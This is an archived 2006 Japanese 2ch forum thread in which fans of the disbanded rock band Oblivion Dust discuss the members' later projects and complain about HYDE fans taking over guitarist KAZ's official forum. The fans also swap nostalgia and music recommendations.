5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

オブリヴィオン・ダストvol.54

1 :伝説の名無しさん:2006/05/06(土) 17:56:35 ?
■前スレ
オブリヴィオン・ダストvol.53
http://music4.2ch.net/test/read.cgi/legend/1116669303/l50

■試聴       http://fruit_juice.tripod.co.jp/trial.html
■記事       http://fruit_juice.tripod.co.jp/interview.html
■過去スレ一覧   http://fruit_juice.tripod.co.jp/index.html

■過去スレ
オブリヴィオンダスト vol.42
http://makimo.to/2ch/music_legend/1026/1026923742.html
オブリヴィオンダストvol.43いや、フューチャーワムだろ
http://makimo.to/2ch/music_legend/1028/1028824245.html
オブリヴィオンダストvol.44 オブリが(・∀・)イチバン!
http://makimo.to/2ch/music_legend/1030/1030115723.html
オブリヴィオンダストvol.45
http://makimo.to/2ch/music2_legend/1030/1030854775.html
オブリヴィオンダストvol.46
http://makimo.to/2ch/music_legend/1031/1031543729.html
【本当の】オブリヴィオンダストvol.47【1周忌】
http://makimo.to/2ch/music3_legend/1032/1032094395.html
オブリヴィオンダスト vol.48
http://makimo.to/2ch/music2_legend/1034/1034967661.html
オブリヴィオンダスト vol.49
http://makimo.to/2ch/music2_legend/1039/1039361093.html
オブリヴィオンダストvol.50
http://makimo.to/2ch/music2_legend/1045/1045938358.html
オブリヴィオンダストvol.51
http://makimo.to/2ch/music2_legend/1056/1056324480.html
オブリヴィオン・ダストvol.52
http://music4.2ch.net/test/read.cgi/legend/1075130232/


2 :伝説の名無しさん:2006/05/06(土) 17:59:44
しばらくレスなくてもこの板なら落ちないよね?

3 :伝説の名無しさん:2006/05/06(土) 18:05:37
祝  1さん三休

4 :伝説の名無しさん:2006/05/06(土) 18:52:20
>1


5 :伝説の名無しさん:2006/05/06(土) 21:58:28
>>1
オツリヴィオン



6 :伝説の名無しさん:2006/05/06(土) 22:27:35
1オツ
サッカーって1stに入ってたっけ?シングルになったのアルバム出たあと?

7 :伝説の名無しさん:2006/05/06(土) 23:31:20
1stシングルのサッカーがでたのは1997年1月22日
1stアルバムはその年の6月25日

8 :伝説の名無しさん:2006/05/07(日) 00:19:30
>>7
マジサンクス
サッカーが1stだったんだすっかり忘れてた

9 :伝説の名無しさん:2006/05/07(日) 09:51:34
1乙。
みんなGW暇だったの?
凄い進んでてびっくりした。

10 :伝説の名無しさん:2006/05/07(日) 13:09:16
暇だったよ

11 : :2006/05/07(日) 18:41:13
1お疲れさん。
過去スレのまとめ一覧サイトがあるのを今知った。

12 :伝説の名無しさん:2006/05/07(日) 19:47:41
オブリビオンデブリ

13 :伝説の名無しさん:2006/05/07(日) 23:38:06
http://ja.wikipedia.org/wiki/%E3%82%AA%E3%83%96%E3%83%AA%E3%83%B4%E3%82%A3%E3%82%AA%E3%83%B3%E3%83%BB%E3%83%80%E3%82%B9%E3%83%88

14 :伝説の名無しさん:2006/05/08(月) 16:19:13
亀だけど、前スレで力司の入れ墨の件で聞いてきた人
FCの会報によれば「関東 彫りゆい」の彫師KOTAROさんに彫ってもらってたみたいよ

15 :伝説の名無しさん:2006/05/08(月) 18:37:12
ソウタ後悔してんだろうなぁ
あんなダサイの入れてw

16 :伝説の名無しさん:2006/05/08(月) 21:11:44
>>14
d!すげえなこれからも増えるんだろうな、力司の入れ墨
フルトンの入れ墨は見た事ねぇ・・・

JU-KENがガクトに参加してるのを知らなかった・・

17 :伝説の名無しさん:2006/05/12(金) 10:32:49
JU-KEN?誰ですか?それ

18 :伝説の名無しさん:2006/05/13(土) 02:41:52
17はいつの時代のファンなんだろか

19 :伝説の名無しさん:2006/05/13(土) 03:17:44
初めて行ったオブリライブがリキジのラストステージだった。
何かファンが怖そうだ、と敬遠せずに行っときゃよかった。

20 :17:2006/05/13(土) 07:52:28
>>18
んなマジレスされても…
JU-KEN好きになれないんだよ

21 :伝説の名無しさん:2006/05/13(土) 10:36:16
7月にロイドが韓国のフェスに出るそうな
オブリでは天候に恵まれず結局ライブできなかったよね


22 :伝説の名無しさん:2006/05/13(土) 17:02:53
同じフェス?
ロイドはトマトジュースに注意だなw

23 :伝説の名無しさん:2006/05/16(火) 13:01:24
今度こそおいしいトマトジュース飲めると良いね。

24 :伝説の名無しさん:2006/05/16(火) 16:26:25
最近になってオブリファンになった。
まじで後悔orz

25 :伝説の名無しさん:2006/05/16(火) 23:53:48
はじめて見た2ちゃんのスレがオブリのスレというモウジャはいないのか

26 :伝説の名無しさん:2006/05/17(水) 01:07:15
亡者((;゚Д゚)ガクガクブルブル

27 :伝説の名無しさん:2006/05/17(水) 05:12:03
リキジねぇ・・・まじで後悔


28 :伝説の名無しさん:2006/05/17(水) 14:11:38
メンバーって今何歳なの?

29 :伝説の名無しさん:2006/05/17(水) 21:24:06
AIR HEAD RADIOのレポサイトないー?

30 :伝説の名無しさん:2006/05/17(水) 22:44:17
ほんと最近のKAZオフィBBSやばいな。
なんだあいつらは。


31 :伝説の名無しさん:2006/05/17(水) 23:25:37
>>25
はじめて見たスレはオブリじゃないと思うが
はじめて2ちゃんみた時音楽の板いってオブリの文字見つけた時は感激したな

32 :伝説の名無しさん:2006/05/21(日) 11:54:58
KAZオフィ・・・orz
岩池があんなだったとはな・・・とゆーかもうみんな離れてんの?

33 :伝説の名無しさん:2006/05/21(日) 14:02:15
岩池はもう・・フルトンももう・・

みんな離れてるというかハイド関連の話しは
うざいのかもね、

34 :伝説の名無しさん:2006/05/21(日) 16:15:58
KAZ・・・正直失望した。
オブリファンを完全に排除した感じ。


35 :伝説の名無しさん:2006/05/21(日) 19:34:53
オブリのカズはもうとっくの昔にいないんだな・・・あー最悪。

てかリキジって今何してんの?

36 :伝説の名無しさん:2006/05/21(日) 19:48:51
リキジはまだMEGA8BALLでライブもやってるみたい


37 :伝説の名無しさん:2006/05/21(日) 21:01:43
でも31がそのとき見たのはヴィジュアル系板です

38 :伝説の名無しさん:2006/05/21(日) 21:08:12
正直そんなサイトあったことすら忘れてたのでずっと見てない
KAZオフィ、ここ一連のレス読んで見に行くのが怖くなったのでやめた。

39 :伝説の名無しさん:2006/05/21(日) 21:25:20
今日KAZサイト見た
KAZしゃんってなんだよ…
ディストとか何かと思った、キモ
本気でキモいからもう行かないだろう
KAZのギターには惚れてたけど
ハイドに関わるとマジでロクなことないな

40 :伝説の名無しさん:2006/05/21(日) 23:06:26
解散ライヴのビデオ欲しいけどやっぱもうどこにもないのかな・・・orz

41 :伝説の名無しさん:2006/05/22(月) 00:02:11
一体なにがおきてるのさ
ガクブル

42 :伝説の名無しさん:2006/05/22(月) 00:13:28
>>39
KAZしゃん・・・・最悪な流れだな。
ハイヲタが流れてるんだろうな。
でも、自分の連れは、オブリファンでKAZにひっついてHYDEライブ参戦してるが、
なかなかかっこいいらしい。

43 :伝説の名無しさん:2006/05/22(月) 00:23:09
MEGA8BALL・・・あー最悪。


44 :伝説の名無しさん:2006/05/22(月) 01:06:09
メガッパチにも何かあったのかと思い公式見にいくも、?
ライブあるみたいだけど、もう行かんー。
ライブ中痴漢推奨バンドなんて見に行きませんわ

45 :伝説の名無しさん:2006/05/22(月) 01:27:49
昨日の夜KAZオフィを見た時に、KAZファンを名乗る人が
ルールを無視したHYDEファンの書き込みを少し否定するような
内容の書き込みをしていたのに、今日見たら削除されてたね。

46 :伝説の名無しさん:2006/05/22(月) 03:09:21
700 :名無し草 :2006/05/20(土) 08:29:51
>>696
パピコ読んできたけど自分は同じ気持ちだから注意したいのはすごい分かるけど
こういうのが出てくるのもすごく不安だったd('-^*)ヨッ!!

キャズのオフィはほんわかしててあんなこという人ほんといなかったしすごく浮いてるd('-^*)ヨッ!!
言ってほしい気持ちはもちろんなくはなかったけど主オフィにきつく言うのとまた違うから
キャズのとこにあんなきついパピコしてほしくなかったd('-^*)ヨッ!!

カズヲタとしてって書いてるけどキャズヲタにはこんな人いないし
あきらかにハイヲタて感じだd('-^*)ヨッ!!

オフィなんだから特に、パピコするんだったら一時の感情じゃなく
もっと深く考えてからしてd('-^*)ネッ!!
もうしてしまったものは仕方ないけどあれはないd('-^*)ヨッ!!

702 :696:2006/05/20(土) 09:53:10
本当にそうだよd('-^*)ネッ!!
書いた後に,自分でも『…よーく考えてみると、やっぱりまずいよなぁ』と思い、
一時の勢いで書いてしまった自分がイタくて情けなくなったd('-^*)ヨッ!!

一応,削除依頼を出しておいたd('-^*)ヨッ!!
漏れの書き込みで荒れる前に,削除されるといいなと思うd('-^*)ヨッ!!

705 :名無し草 :2006/05/20(土) 15:09:01
キャズオフィはROMるだけにしようと
自分は決めてるd('-^*)ヨッ!!
あそこはオブリヲタとhideソロヲタの聖域だと思ってるからd('-^*)ネッ!!

47 :伝説の名無しさん:2006/05/22(月) 11:38:47
自分ハイドのライブになんとなーく行ったが、
となりにいたあきらかにハイヲタが
「カズ―カズ―きゃーもーカズさんかっこよすぎっっ」とかなんとかわめいててかなりひいた・・・

>>45
その書き込み見たかったな
必要な書き込みは消すなよってかんじだ

48 :伝説の名無しさん:2006/05/22(月) 12:02:19
「うちゅーじーん」と叫んでハイヲタをひかせてやりたい。

49 :伝説の名無しさん:2006/05/22(月) 12:09:03
削除依頼って出せるんだ
どーやってだすんだろ

50 :伝説の名無しさん:2006/05/22(月) 13:17:54
カズオフィにある書き込みはカズがかなりかっこいいって言われまくってる
ね。ギター弾いてるときは確かにかっこいいけど
オブリからファンのやつは宇宙人とかしか思えないって・・・

51 :伝説の名無しさん:2006/05/22(月) 17:26:16
モノラルもハイドヲタにやられたしな。
ほんとラル糞に関わるとロクなことねぇよorz

52 :伝説の名無しさん:2006/05/22(月) 18:07:59
プレイ中のKAZは確かに最高にカッコいい
でも普段のKAZはただのヨーダにしか見えない

53 :伝説の名無しさん:2006/05/22(月) 22:19:31
ヨーダw


54 :伝説の名無しさん:2006/05/23(火) 00:06:59
mega8のオヒみたけどトップページとライブ日程しか見れず
詳細きぼん
痴漢推奨ってネタじゃなくて?

55 :伝説の名無しさん:2006/05/23(火) 00:39:25
ネタといえばネタなのか?
個人的にはその場でテンション一気に下がった。

ライブ中に前の方女の子ばかりだったから、
メガ8の声担当の人(名前知らず)が
男子もっと前来て、おっぱい揉んじゃえ。
みたいな発言をしたのさ。

56 :伝説の名無しさん:2006/05/23(火) 09:33:49
まさるは大丈夫かな?ちゃんと生きてるかな?

57 :伝説の名無しさん:2006/05/23(火) 10:56:52
>>55
それは前のMCが言ったヤツだな。
ヤツはもう辞めたよ。
まぁ今のMCも似たようなモンだがw

58 :伝説の名無しさん:2006/05/23(火) 22:02:08
MEGA8BALLはもう辞めた・・・

59 :伝説の名無しさん:2006/05/23(火) 23:04:50
フェイケのBEELZEBUB今日タワレコで買って
きいてみたけど だめだぁ やっぱ合わんかった
一発踏みつけてゴミ箱にポイッ
もういいや

60 :伝説の名無しさん:2006/05/23(火) 23:18:41
>59
ちょwwwww
そこまでしなくても
まだ聴いてない俺にくれや
今ロイドのソロ状態なんだろ?
イノランがいた頃感じたビジュ臭さが無くなってたら最高

61 :伝説の名無しさん:2006/05/24(水) 01:54:30
買おうと思ったけどやっぱやーめた

62 :伝説の名無しさん:2006/05/24(水) 12:19:31
すんごい今更なんだけどマサルがダイバー蹴り落としたっていってたけど
何で?

63 :伝説の名無しさん:2006/05/24(水) 13:28:12
下手糞でエフェクターボードとか踏みやがったからとかなんとか。

64 :伝説の名無しさん:2006/05/24(水) 20:12:27
ラストライヴ無くしちゃったからエイビックスに問い合わせ
してみたら在庫無いって・・・(゚`Д´゚)ノ゚。ウワァァァン!!

65 :伝説の名無しさん:2006/05/25(木) 01:21:01
>59
結構スルメかもしれんよ
漏れも昨日買って思い切りハズレだと思ったけど
今日一日流し聞きしてたら悪くないと思い始めた
今もリピート中

66 :伝説の名無しさん:2006/05/25(木) 03:36:00
悪くない、じゃな〜
ヒプホプぽいんでしょ?

67 :伝説の名無しさん:2006/05/25(木) 10:10:30
KAZオフィ、キモい
あんなやつらにオブリを語られたくない

68 :伝説の名無しさん:2006/05/25(木) 14:30:56
>65
スマン59だけど オブリの時のロイドのボーカルが
本当に好きだったから かなりがっかりで
ヒプホプぽいっていってもNO REGRETSは好きだったけど
これは聞きこみたくないと思った 歌詞も悪いし
KAZやINOをけってまでやりたかったサウンドがこれとは・・・
もちろんこれはこれでいいとおもうけど

69 :伝説の名無しさん:2006/05/25(木) 20:36:36
うげげ、ヒプホプぽいのか、超ダメだ。
No regretsはバタフライヘッドの中で一番聴かない曲だったなぁ。

70 :伝説の名無しさん:2006/05/25(木) 22:46:29
なんつーか視野狭いヤツばっかだな。

71 :伝説の名無しさん:2006/05/25(木) 23:59:08
マサルとリキジって地元一緒なの?

72 :伝説の名無しさん:2006/05/26(金) 00:29:47
>>71
どっちも埼玉。

73 :伝説の名無しさん:2006/05/26(金) 01:16:43
うげげFAKE?スレから来るぞ

74 :伝説の名無しさん:2006/05/26(金) 02:05:25
あーだからよく埼玉テレビにでてたのか

75 :伝説の名無しさん:2006/05/26(金) 03:26:23
>>74
それは関係ないだろ十万石まんじゅう

76 :伝説の名無しさん:2006/05/26(金) 17:01:04
誰かラストライヴのビデオ、テレビで流れたライブ映像のビデオ
ヤフオクに出してよー。゚(゚ `Д)ノ。゚ヽ(  )ノ゚。ヽ(Д´ ゚)ノ゚。。゚ヽ(゚`Д´゚)ノ゚。ウワァァァン!!


77 :伝説の名無しさん:2006/05/26(金) 17:24:36
>>76
おいおい今出したらKAZオフィの奴もねらってるからやばいだろ

78 :伝説の名無しさん:2006/05/26(金) 17:28:09
>>77
久しぶりにKAZオフィ見てみたらほんと気分悪くなったよ。

去年くらいに友達にオブリのCD貸してみたらはまったからライヴビデオも貸した
んだよ。そしたら3週間前にその友達の家火事になっちゃって・・・
フツーになくしたんなら怒るけどそんな状況じゃ何も言えないんだよ(゚`Д´゚)ノ゚。ウワァァァン!!

79 :伝説の名無しさん:2006/05/26(金) 19:21:19
気の毒としかいいようが…

80 :伝説の名無しさん:2006/05/27(土) 00:00:23
>>77
そうだねぇ、恐る恐るKAZオフィ見たら、ちょっと怖くなったよ。

81 :伝説の名無しさん:2006/05/27(土) 00:24:32
まさかこの中にはハイド関連から好きになりました
見たいなやついないよね?



82 :伝説の名無しさん:2006/05/27(土) 00:41:38
ぶっちゃけ紛れてるだろ

83 :伝説の名無しさん:2006/05/27(土) 02:17:35
>>76がそうなんじゃない?

84 :82:2006/05/27(土) 02:30:02
>83
ぶっちゃけ俺もそうだと思う

85 :伝説の名無しさん:2006/05/27(土) 04:31:32
>>76

今バッタバタしてるから気長に待ってな(´ω`)


86 :伝説の名無しさん:2006/05/27(土) 10:55:16
もう嫌だYO!オブリ全員消滅ですか・・・

87 :伝説の名無しさん:2006/05/27(土) 11:41:13
オブリ解散した後はなに聞いてんの?

88 :伝説の名無しさん:2006/05/27(土) 13:30:30
じゃあストテンのベストとリンキンのPVでも今さら
買ってこよ UKもいろいろ聴くし最近のんではスウィッチフットの
ギターとかドイツのミクスチャーバンドとかいいなと思ったけど
やっぱりオブリが一番好きだね
みんなは何聞いてるの?



89 :伝説の名無しさん:2006/05/27(土) 16:59:08
SALIVA、THE MAD CAPSULE MARKETS

90 :伝説の名無しさん:2006/05/27(土) 18:06:54
最近よく聴いてるのは
ブンブンサテライツ、シルヴァーサーファー、セニョールココナッツ

91 :伝説の名無しさん:2006/05/27(土) 22:48:24
よく聴くというか、これは一生もんだなと思ったのは洋楽だとスマパンとピクシーズとストテン
あと邦楽はヒデってかzilchとFAKE?とHATE HONEY

92 :伝説の名無しさん:2006/05/28(日) 09:17:54
HATEって解散かなんかゆってなかった?
どっかのライブハウスにチラシ貼ってあったような
見間違い?

93 :伝説の名無しさん:2006/05/28(日) 12:58:42
解散だね

94 :伝説の名無しさん:2006/05/28(日) 17:13:37
久しぶりに来てみたらまだ続いてたんだね。
てか岩池またラルクと絡んでるorz テツ69の悪夢が・・・・

95 :伝説の名無しさん:2006/05/28(日) 20:39:11
>>90
ブンブンは結構いい
てか>>90もしかしてブログやってる?
やってたらみたことあるかも


96 :伝説の名無しさん:2006/05/28(日) 22:41:21
>>90です、残念ながらブログはやってません。

97 :伝説の名無しさん:2006/05/30(火) 01:05:42
今日7時半からKENラジオに出るね

98 :伝説の名無しさん:2006/06/01(木) 22:09:53
ベストの8曲目が好き

99 :伝説の名無しさん:2006/06/02(金) 00:32:26
ミザリーの3曲目が好き

100 :伝説の名無しさん:2006/06/02(金) 00:50:59
お前ら曲名書け

101 :伝説の名無しさん:2006/06/02(金) 19:58:36
KAZ・・
「どす」って・・・

102 :伝説の名無しさん:2006/06/05(月) 19:21:03
                            
   \よしよし、また一緒にオブリやろう。 /
      ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            ∧_∧
           " ,  、ミ KAZ
            ゝ∀ く
           ∧_∧  |   ________________
        三  (    とノ /                    
      三   / ロイド つ | < FAKEもうやだよ〜! 
     三  _ ( _  /|  |  \                 
        (_ソ(_ソ(_ )   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

↑このAA懐かしい。

103 :伝説の名無しさん:2006/06/05(月) 21:56:35
岩池がオロナミンCのCMに出てる
いつの間に…

104 :伝説の名無しさん:2006/06/05(月) 22:57:36
ちょwwうめず先生www

似てるな。

105 :伝説の名無しさん:2006/06/06(火) 19:38:43
オブリが(・∀・)イチバン!

106 :伝説の名無しさん:2006/06/06(火) 20:42:51
懐かしw

107 :伝説の名無しさん:2006/06/07(水) 12:17:07
何か最近いろんなスレで岩池の話がでてる

108 :伝説の名無しさん:2006/06/07(水) 15:33:16
>>107
どこー?

109 :伝説の名無しさん:2006/06/07(水) 22:54:54
暇だから過去スレ見てら・・・

881 名前: 伝説の名無しさん 03/06/09 23:16

>>869
岩池、何かの間違いでサポートでステージ上がって
廃土の後ろで「岩池、父ちゃん夢の共演」

…これだけは避けたい゜・(ノД`)゜・。・
884 名前: 名無しのエリー 03/06/10 00:05

>>881
激しく見たくないがありえなくもなくね?
フルトンがCDでも叩いてるなら尚更

そういえばラルクのギターが抜けてKAZ加入って噂あったよな
当たってなくも…ない…


現実になっとるがなヽ(`Д´)ノ

110 :伝説の名無しさん:2006/06/08(木) 00:36:16
そういえばデザイナーフィータスの時
「もう俺たちが1位をとってやろうとかじゃなくて
 どれだけチャートを汚せるか」
ってKEN言ってたなぁ・・
懐かし


111 :伝説の名無しさん:2006/06/08(木) 17:43:29
265 :NO MUSIC NO NAME:2006/06/07(水) 01:52:54 ID:HmIK3udq
今のサポートメンバーを正式なメンバーにしないのはナゼだろうね。
またサポートメンバーだからこそ仲良くやれてるっていう節もあるのを理解できないのかな?


276 :NO MUSIC NO NAME:2006/06/07(水) 04:14:57 ID:K8ef6CWZ
>>265
それはやっぱりラルクがあるからじゃないかな
ソロの時期はいいけど、もし正式に迎え入れてしまってもラルクがあるときは
仕事ないのに縛り付けてる状態になる
ハイドは、きっと本当はカズを正式メンバーにしたいと思ってなくはないと思うよ
HYDEというソロはKAZとのユニットのつもりと言い切るくらいだし

カズほどハイドの心掴んだ人いないし
ハイドが求めてる、出したいと思う理想の音を一緒に創れるのはカズだと思うし

ずっとラルク好きだった者からしたら少し悲しいけど
ハイドがここまで好きなことをやれて、楽しそうに、悔いはないとも言ってくれるなんてすごいことだから
ハイドがそんなにも楽しいなら、ソロに専念してくれてもいいとさえ思える


こんな事にもなるもんなんだね
てゆーか岩池、最初は金目当てだと思ってたけど
金目当てだけでここまでやるかってかんじだ
本人はそれなりにやっぱハイドのこと認めてるんじゃない?
雑誌でもけっこう語ってるし

112 :伝説の名無しさん:2006/06/08(木) 18:22:10
よくわかんないけどやっぱり廃土絡みはやだ
オブリ後の一緒にやる相手が微妙すぎて追っかける気にもならん
どうにかならないものか

113 :岩池:2006/06/08(木) 22:02:05
俺には関係ねぇ。

114 :伝説の名無しさん:2006/06/08(木) 23:49:25
ハイドソロのKAZ曲は良かったけど、ハイドは凄いのかよくわからん
ロイドよりメロディメイカーとしては落ちると思う

115 :伝説の名無しさん:2006/06/08(木) 23:54:16
そりゃハイドの仕事はおいしいからね
食いっぱぐれないように必死なのさ

116 :伝説の名無しさん:2006/06/08(木) 23:56:14
KAZオフィのHYDEIST、どーにかして下さい。
読んでて、気が狂いそうになった。

117 :伝説の名無しさん:2006/06/09(金) 17:04:00
カズには新しいバンド組んで欲しいって5年前から思ってたのに
もうダメなのか・・・ orz

118 :伝説の名無しさん:2006/06/10(土) 11:55:02
テツロクといいハイドといいビジネスとして割り切ってると信じている



119 :伝説の名無しさん:2006/06/10(土) 16:09:11
ブリヲタはカズを神聖視しすぎてるよ
INAとなんかやるとか言ってたのも流れてるし
元々カズはハイヲタと波長があうキャラだった

120 :伝説の名無しさん:2006/06/10(土) 17:03:40
テツロクがオブリメンバーとどう関係あったかもう覚えてない・・・
健忘症や。

121 :伝説の名無しさん:2006/06/11(日) 22:43:35
カズのサイト見て来た。
なんか自分が取り残されてる感じがして切なくなった。盛り上がってる人が裏山。
解散してから時間が止まったまんまだよ、、、
もうすぐ解散して5年目だっけな。カナシス

122 :伝説の名無しさん:2006/06/11(日) 23:14:54
盛り上がってるのはハイヲタだけだから心配するな

123 :伝説の名無しさん:2006/06/11(日) 23:25:20
もう5年か・・・ 
何だかんだいってオブリから離れられない自分が嫌だ、、、

124 :121:2006/06/12(月) 18:51:51
>>123
おお、そういう人ってやっぱいるんだよねー嬉しいわ。
何か同じような気持ちの人と一晩中思い出話をしたいよ。
友達みんなオブリの事思い出すと悲しくなるって言って
今やNGワードになっちゃったから。

125 :伝説の名無しさん:2006/06/12(月) 19:08:44
KAZ BBS
少し前のMONORAL BBSみたい…

126 :伝説の名無しさん:2006/06/13(火) 16:16:33
ほんと最近気付いて自分のアフォさ加減にショックだったこと
GOODBYEの「忘れさせて」ってとこずっと今まで「キスをさせて」
だと思ってた・・・

   ||
 Λ||Λ
( / ⌒ヽ    ....鬱打死脳
 | |   |
 ∪ 亅|
  | | |
  ∪∪
   :
   :

 ‐ニ三ニ‐


127 :伝説の名無しさん:2006/06/13(火) 22:05:36
オブリから離れられない人なんてまだいるんだね
なんかかわいそう
他に楽しみ見つけたら?

128 :伝説の名無しさん:2006/06/14(水) 00:52:32
別に離れる必要はない
解散したっていいバンドはいいバンドだ
でも、いい加減飽きてるのにオブリ以外の音楽に興味が湧かず
先入観で他の音楽を切り捨ててるようなやつはさっさと視野を広げろ
そんなやついないと思うけど

129 :伝説の名無しさん:2006/06/14(水) 23:32:11
オブリがいなくなってからの時間の方が長いのに
いまだにオブリのように夢中になれるバンドが見つからなくて辛いよ

130 :伝説の名無しさん:2006/06/14(水) 23:44:59
オブリ以外も聞いてるし、視野が狭いとは思わないけど、
あそこまで熱くなれることはもうないかなとか思ってる。

自分にとっては唯一無二であって、他に求めようとするから辛いんじゃない?
正直、オブリ再結成したとしても、あの頃のように熱くなれるとも思わない。

131 :伝説の名無しさん:2006/06/15(木) 00:02:57
若かったんだよ、みんな

132 :伝説の名無しさん:2006/06/15(木) 01:59:54
ライブ大好きなのに行きたいライブもなくてつらいよ
オブリのライブがあったころは楽しかったね
マンスリーでブリッツやった時が最高によかったな

133 :伝説の名無しさん:2006/06/15(木) 02:27:22
同じような音楽を求めるから駄目
まったく違うジャンルがいいと思うよ
そのうちみつかると思う

134 :伝説の名無しさん :2006/06/15(木) 03:12:05
未だにオブリはよく聞くなぁ
変な存在だよ
ここも覗いてしまうし

音楽からは離れてないけど
ラジオ聞いたり雑誌読んだりする程
好きになるアーティストはもう出てこないな
ほんと若かった

135 :伝説の名無しさん:2006/06/15(木) 09:19:53
同じような気持ちの人が沢山いるんだなぁ


136 :伝説の名無しさん:2006/06/16(金) 00:02:56
違うジャンルを好きになれる気配がありません
ごめんなさいごめんなさい

137 :伝説の名無しさん:2006/06/16(金) 10:08:21
KENもソロは長続きしなさそうだし
KAZもユニットやサポは色々やってきたけどバンドは一度も組んでないし
力司や父ちゃんは暇そうだし、マサルは休養中だし
来年、再結成しそうな気がする
解散したバンドが再結成なんてどうでもいいけどOBLIはなんか特別

138 :伝説の名無しさん:2006/06/16(金) 10:29:16
マサル心配だ・・・

139 :伝説の名無しさん:2006/06/16(金) 10:36:49
個人的にはものすごく再結成してほしいけどオブリは絶対しない
ような・・・
リキジってメガ8やってんじゃないの? 

140 :伝説の名無しさん:2006/06/16(金) 21:31:21
再結成は無いだろうな
でも不仲で解散だから時が経てば、、、

141 :伝説の名無しさん:2006/06/16(金) 22:15:57
そうそう。不仲ってかケンが続けられなくなったから解散したんだし、
10年後くらいに今のバウハウスみたいに…。

142 :伝説の名無しさん:2006/06/17(土) 09:08:05
友達じゃないだけで不仲ではないだろー

143 :伝説の名無しさん:2006/06/20(火) 00:05:45
最近めっきりこのスレも回らなくなったな・・・
ところでKAZは、HYDEのツアーが終わったらどうする気だろ。
まただれかのサポメンになるんだろうか・・・
ラルクと離れてくれないかな。
痛いヲタが増殖しすぎてんじゃん。
オフィとか話に出てるけど、もうあそこはヨーダのオフィではなく、
完全にHYDEヲタのすみかだ。
それともKAZが変わったのか・・・・

144 :伝説の名無しさん:2006/06/24(土) 12:48:35
来週テレビでM:I-2あるけど少しはOBLI流れる?

145 :伝説の名無しさん:2006/06/24(土) 13:34:16
流れまくるから見とけw

146 :伝説の名無しさん:2006/06/24(土) 17:22:18
国内盤サントラのみの参加って事は、本編では使用されてないんじゃないの?

147 :伝説の名無しさん:2006/06/24(土) 22:15:07
映画観に行ったけど流れてませんでした。

148 :伝説の名無しさん:2006/06/24(土) 23:56:56
>145
ワロタwwwww

>146-147
マジレスすんなよ

149 :伝説の名無しさん:2006/06/25(日) 21:01:12
歌だけ聴いた場合一番好きな曲はどれ?

150 :伝説の名無しさん:2006/06/25(日) 22:58:38
歌だけっていうのは、(楽器とかの)音を抜かしたメロディだけってこと?
それとも、ロイドのボーカルだけってこと?

151 :伝説の名無しさん:2006/06/26(月) 00:37:41
歌が際立ってる感のあるDISAPPEARとTRUSTの
アコースティックバージョンjみたいの結構好きだ。
久々に聴きたくなったな、CD捜さなきゃ。

152 :伝説の名無しさん:2006/06/26(月) 03:00:26
>歌だけっていうのは、(楽器とかの)音を抜かしたメロディだけってこと?

そう。歌で一番好きなのと、演奏だけで一番好きなの教えて

153 :伝説の名無しさん:2006/06/26(月) 09:30:44
歌  CRAZY
演奏 PLASTIC WINGS

154 :伝説の名無しさん:2006/07/01(土) 14:18:55
KAZオフィに続いて、父ちゃんのファンサイトにまで
ハイドヲタがなだれ込んできたー(泣)

まじ消えて欲しい、あの人達。

155 :伝説の名無しさん:2006/07/01(土) 16:48:37
まあもう少しでいなくなるんじゃないかな
何かほんとに気持ち悪い書き込みばっかで萎えるよ

この前初めてフェイクのライブ行ったけどやっぱケンもカズもバンド組んで
ほしい・・・


156 :伝説の名無しさん:2006/07/01(土) 22:47:32
カズはあの基地害ヲタに囲まれて嬉しいのか?

157 :伝説の名無しさん:2006/07/01(土) 23:46:33
今のKAZオフィで「KEN」っていうと
普通にラルクのギターの事だと思われちまう。

ありえねー。

>>156
・・・嬉しそうだよな。

158 :伝説の名無しさん:2006/07/02(日) 00:08:26
父ちゃんのサイトは父ちゃんの自作自演なんだが、、、

159 :伝説の名無しさん:2006/07/02(日) 14:08:24
>>158
どーゆう意味?

160 :伝説の名無しさん:2006/07/03(月) 02:32:39
ちょっと遅れたけど歌はalienがいい
最後の方の切ない声にグッとくる

161 :伝説の名無しさん:2006/07/03(月) 20:08:33
何かハイドからのファンなのに昔からオブリファンですみたいに語られると
むかつくなあ

162 :伝説の名無しさん:2006/07/03(月) 23:49:55
オフィ見てない上で言うけど、ほっとけよw
モノラルみたいになったら最悪だけど
オブリ解散してるし

163 :伝説の名無しさん:2006/07/04(火) 20:35:46
私はオブリのチラシでhideの事を知ったんだけどサイエンスとか何回も聞いて
いると昔から知ってたような錯覚に陥ることあるよw
はずかしいが

164 :伝説の名無しさん:2006/07/04(火) 23:01:19
サイエンス、そんな曲名あったかなぁ?
英語タイトル 多すぎて 覚えられない 
2回読んだら やっとわかった それhide曲?

165 :伝説の名無しさん:2006/07/05(水) 00:19:54
つまりkazオフィの自称オブリファンもそうではないかってことか

166 :伝説の名無しさん:2006/07/05(水) 09:45:12
「kazもフルトンもオブリの頃から知ってます」って言いたいから、みたいな?

167 :伝説の名無しさん:2006/07/05(水) 09:49:10
>163
逆パターンだよね
hideからオブリって人のが多そう

168 :伝説の名無しさん:2006/07/05(水) 18:05:39
俺はzilchの『3・2・1』封入のビラでオブリを知ったよ。
元々洋楽と現音しか聴かなかったけど、インダストリアル系が大好きだったから、
当時の彼女にzilchのRemix盤を薦められて。

で、オブリが切欠でhideも聴く様になった。

zilch
└SCHAFT、Oblivion Dust
    │       └hide
    │         └X JAPAN
    └BUCK-TICK、Soft Ballet
                └P-MODEL、平沢進

みたいな。

それとは別に、NapsterとかMXで、メキシコ人とかに薦めてもらったバンドも聴いたりする。
vidollとかcali≠gariとか。音源気に入ってからヴィジュだと知って、それまで持ってたヴィジュに対する偏見が多少は和らいだ。

169 :伝説の名無しさん:2006/07/06(木) 20:56:58
レイプロデュースの岩池バンドがまた見たいよ

170 :伝説の名無しさん:2006/07/06(木) 21:11:58
でも、レイはもう…

171 :伝説の名無しさん:2006/07/06(木) 21:33:19
死んだの?

172 :伝説の名無しさん:2006/07/07(金) 00:11:35
何?レイ太り過ぎで死んだの?

173 :伝説の名無しさん:2006/07/07(金) 01:03:55
INAのBLOGを見てみよう。

174 :伝説の名無しさん:2006/07/07(金) 06:05:33
興味ないからブログの存在すら知らんw

175 :伝説の名無しさん:2006/07/07(金) 10:44:46
